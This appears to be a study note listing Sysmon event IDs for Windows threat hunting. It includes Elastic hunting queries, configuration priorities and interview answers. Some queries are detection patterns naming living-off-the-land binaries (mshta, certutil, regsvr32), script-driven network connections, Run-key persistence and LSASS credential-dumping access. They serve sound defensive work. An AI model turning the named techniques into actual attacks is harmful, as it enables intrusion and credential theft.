Sysmon Event IDs
Sysmon Event IDs
One-liner: A reference of key Sysmon event IDs essential for threat hunting, detection engineering, and security monitoring.
🎯 What Is It?
Sysmon (System Monitor) is a Windows system service that logs detailed system activity to the Windows Event Log. Each event type has a unique Event ID that captures specific behaviors. Understanding these Event IDs is critical for:
- Building detection rules
- Threat Hunting investigations
- Incident response and forensics
- MITRE ATT&CK technique detection
📊 Key Event IDs for Threat Hunting
Process & Execution Events
| Event ID | Name | Description | Use Case |
|---|---|---|---|
| 1 | Process Creation | Logs full command line for new processes | Hunt malicious execution, LOLBAS abuse |
| 2 | Process Changed File Creation Time | Timestomping detection | Defense evasion detection |
| 5 | Process Terminated | Process end events | Track malware execution duration |
| 6 | Driver Loaded | Kernel driver loading | Rootkit/driver-based attacks |
Network Events
| Event ID | Name | Description | Use Case |
|---|---|---|---|
| 3 | Network Connection | TCP/UDP connection initiated | C2 detection, data exfiltration |
| 22 | DNS Query | DNS resolution events | DNS Tunneling, C2 beaconing |
File & Registry Events
| Event ID | Name | Description | Use Case |
|---|---|---|---|
| 11 | File Created | File creation events | Malware drops, persistence |
| 12 | Registry Object Added/Deleted | Registry key/value changes | Persistence via Run keys |
| 13 | Registry Value Set | Registry value modifications | Hunt autoruns, config changes |
| 14 | Registry Rename | Registry key renamed | Evasion technique detection |
| 15 | FileCreateStreamHash | Alternate Data Stream creation | Hidden payload detection |
| 23 | File Deleted | File deletion (archived) | Evidence destruction tracking |
Injection & Evasion Events
| Event ID | Name | Description | Use Case |
|---|---|---|---|
| 7 | Image Loaded | DLL loading events | DLL hijacking, injection prep |
| 8 | CreateRemoteThread | Thread created in another process | Process Injection detection |
| 10 | ProcessAccess | Process access events | Credential dumping (LSASS access) |
| 25 | Process Tampering | Process image modification | Process hollowing detection |
Other Important Events
| Event ID | Name | Description | Use Case |
|---|---|---|---|
| 16 | Sysmon Config Change | Sysmon configuration modified | Tampering detection |
| 17 | Pipe Created | Named pipe creation | C2 communication, lateral movement |
| 18 | Pipe Connected | Named pipe connection | SMB lateral movement |
| 19-21 | WMI Events | WMI activity monitoring | WMI-based persistence/execution |
🕵️ Threat Hunting Scenarios (from THM)
Hunt Process Injection (Event ID 8)
host.name: WKSTN-* AND winlog.event_id: 8
Columns: process.executable, winlog.event_data.SourceUser, winlog.event_data.TargetImage
Hunt Malicious File Downloads (Event ID 11)
host.name: WKSTN-* AND process.name: chrome.exe AND winlog.event_id: 11
Columns: winlog.computer_name, winlog.event_data.User, file.path
Hunt Registry Persistence (Event ID 13)
host.name: WKSTN-* AND winlog.event_id: 13
AND registry.path: (*CurrentVersion\\Run* OR *CurrentVersion\\Explorer\\Shell*)
Columns: process.name, registry.path, winlog.event_data.Details
Hunt LOLBAS Execution (Event ID 1 + 3)
host.name: WKSTN-* AND winlog.event_id: (1 OR 3)
AND process.name: (mshta.exe OR certutil.exe OR regsvr32.exe)
Hunt Network Connections from Scripts (Event ID 3)
host.name: WKSTN-* AND winlog.event_id: 3
AND process.name: (*python* OR *php* OR powershell.exe)
📋 Recommended Sysmon Configuration
For threat hunting, ensure your Sysmon config captures at minimum:
| Event ID | Priority | Reason |
|---|---|---|
| 1 | Critical | All process creation with command lines |
| 3 | High | Network connections for C2 detection |
| 7 | Medium | DLL loads (can be noisy, filter carefully) |
| 8 | Critical | CreateRemoteThread for injection |
| 10 | High | Process access for credential theft |
| 11 | High | File creation for malware drops |
| 13 | High | Registry mods for persistence |
| 22 | High | DNS queries for tunneling detection |
🎤 Interview Angles
Common Questions
- "Which Sysmon events are most important for threat detection?"
- "How would you detect process injection using Sysmon?"
- "What's the difference between Event ID 12 and 13?"
- "How do you handle Sysmon event volume in a large environment?"
Quick Answer
"For threat hunting, I prioritize Event ID 1 (process creation), 3 (network connections), 8 (CreateRemoteThread for injection), 10 (process access for LSASS dumping), 11 (file creation), and 13 (registry changes for persistence). These cover the core MITRE ATT&CK techniques: Execution, C2, Defense Evasion, Credential Access, and Persistence."
✅ Best Practices
- Use a well-tuned Sysmon config (e.g., SwiftOnSecurity, Olaf Hartong)
- Forward Sysmon logs to SIEM for centralized analysis
- Create baseline of normal events before hunting
- Combine with PowerShell Script Block Logging for full visibility
- Monitor Event ID 16 for Sysmon config tampering
🔗 Related Concepts
- Sysmon
- Windows Event Logs
- Threat Hunting
- Process Injection
- MITRE ATT&CK
- Living off the Land (LOLBAS)
- Elastic
📚 References
- Microsoft Sysmon Documentation: https://docs.microsoft.com/sysinternals/sysmon
- SwiftOnSecurity Sysmon Config: https://github.com/SwiftOnSecurity/sysmon-config
- SANS Sysmon Cheat Sheet
- TrustedSec Sysmon Community Guide